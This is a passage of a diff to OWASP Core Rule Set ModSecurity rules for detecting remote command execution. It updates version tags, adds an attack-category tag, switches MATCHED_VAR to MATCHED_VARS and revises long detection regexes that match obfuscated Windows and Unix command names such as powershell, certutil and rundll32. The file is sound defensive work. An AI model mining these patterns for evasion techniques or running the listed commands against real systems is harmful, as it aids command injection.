\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*(?:h[\"\^]*a[\"\^]*r[\"\^]*e|t[\"\^]*a[\"\^]*t))|l[\"\^]*(?:b[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*s[\"\^]*t)|s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u[\"\^]*p|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|c[\"\^]*m[\"\^]*d[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*t|f[\"\^]*r[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*l))|o[\"\^]*(?:f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|p[\"\^]*(?:a[\"\^]*(?:g[\"\^]*e[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i|t[\"\^]*h[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|(?:b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|k[\"\^]*t[\"\^]*m[\"\^]*o)[\"\^]*n|e[\"\^]*(?:n[\"\^]*t[\"\^]*n[\"\^]*t|r[\"\^]*f[\"\^]*m[\"\^]*o[\"\^]*n)|n[\"\^]*p[\"\^]*u[\"\^]*(?:n[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*n[\"\^]*d|t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:p[\"\^]*d|w[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l)|r[\"\^]*n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|(?:d[\"\^]*r[\"\^]*v|m[\"\^]*n[\"\^]*g)[\"\^]*r|j[\"\^]*o[\"\^]*b[\"\^]*s|p[\"\^]*o[\"\^]*r[\"\^]*t|q[\"\^]*c[\"\^]*t[\"\^]*l)|u[\"\^]*(?:b[\"\^]*p[\"\^]*r[\"\^]*n|s[\"\^]*h[\"\^]*(?:d|p[\"\^]*r[\"\^]*i[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s))|w[\"\^]*(?:l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r|s[\"\^]*h))|q[\"\^]*(?:a[\"\^]*p[\"\^]*p[\"\^]*s[\"\^]*r[\"\^]*v|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|u[\"\^]*s[\"\^]*e[\"\^]*r|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|r[\"\^]*(?:d(?:[\"\^]*p[\"\^]*s[\"\^]*i[\"\^]*g[\"\^]*n)?|e[\"\^]*(?:f[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|g(?:[\"\^]*(?:i[\"\^]*n[\"\^]*i|s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2))?|l[\"\^]*o[\"\^]*g|(?:(?:p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|s[\"\^]*c[\"\^]*a)[\"\^]*)?n|x[\"\^]*e[\"\^]*c)|i[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|m[\"\^]*d[\"\^]*i[\"\^]*r|o[\"\^]*b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|p[\"\^]*c[\"\^]*(?:i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*i[\"\^]*n[\"\^]*g)|s[\"\^]*h|u[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|s[\"\^]*(?:a[\"\^]*n|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|w[\"\^]*c[\"\^]*m[\"\^]*d)|e[\"\^]*(?:c[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*t|r[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*(?:(?:c[\"\^]*e[\"\^]*i[\"\^]*p|w[\"\^]*e[\"\^]*r)[\"\^]*o[\"\^]*p[\"\^]*t[\"\^]*i[\"\^]*n|m[\"\^]*a[\"\^]*n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*m[\"\^]*d)|t[\"\^]*x)|f[\"\^]*c|(?:h[\"\^]*o[\"\^]*w[\"\^]*m[\"\^]*o[\"\^]*u[\"\^]*n|u[\"\^]*b[\"\^]*s)[\"\^]*t|x[\"\^]*s[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|y[\"\^]*s[\"\^]*(?:o[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o))|t[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n|p[\"\^]*i[\"\^]*c[\"\^]*f[\"\^]*g|s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t))|(?:c[\"\^]*m[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u|f[\"\^]*t)[\"\^]*p|(?:(?:e[\"\^]*l[\"\^]*n[\"\^]*e|i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u)[\"\^]*|r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*(?:p[\"\^]*)?)t|l[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*n|p[\"\^]*m[\"\^]*(?:t[\"\^]*o[\"\^]*o[\"\^]*l|v[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r)|s[\"\^]*(?:(?:d[\"\^]*i[\"\^]*s[\"\^]*)?c[\"\^]*o[\"\^]*n|e[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p|k[\"\^]*i[\"\^]*l[\"\^]*l|p[\"\^]*r[\"\^]*o[\"\^]*f)|y[\"\^]*p[\"\^]*e[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*f|z[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|u[\"\^]*n[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*s[\"\^]*e|i[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*i[\"\^]*d|l[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*t[\"\^]*r)|v[\"\^]*s[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|w[\"\^]*(?:a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|(?:d[\"\^]*s|e[\"\^]*(?:c|v[\"\^]*t))[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|i[\"\^]*n[\"\^]*(?:n[\"\^]*t(?:[\"\^]*3[\"\^]*2)?|r[\"\^]*s)|m[\"\^]*i[\"\^]*c|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|x[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \
     "id:932380,\
     phase:2,\
     block,\
@@ -866,16 +882,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -918,7 +935,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'O
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932231
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \
     "id:932231,\
     phase:2,\
     block,\
@@ -932,9 +949,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -965,9 +983,10 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1014,16 +1033,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.932200_matched_var_name=%{matched_var_name}',\
     chain"
-    SecRule MATCHED_VAR "@rx /" \
+    SecRule MATCHED_VARS "@rx /" \
         "t:none,\
         chain"
-        SecRule MATCHED_VAR "@rx \s" \
+        SecRule MATCHED_VARS "@rx \s" \
             "t:none,\
             setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
             setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1056,9 +1076,10 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^#]+" \
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.932205_matched_var_name=%{matched_var_name}',\
     chain"
@@ -1099,16 +1120,17 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.932206_matched_var_name=%{matched_var_name}',\
     chain"
-    SecRule MATCHED_VAR "@rx /" \
+    SecRule MATCHED_VARS "@rx /" \
         "t:none,\
         chain"
-        SecRule MATCHED_VAR "@rx \s" \
+        SecRule MATCHED_VARS "@rx \s" \
             "t:none,\
             setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
             setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1118,7 +1140,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932220
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)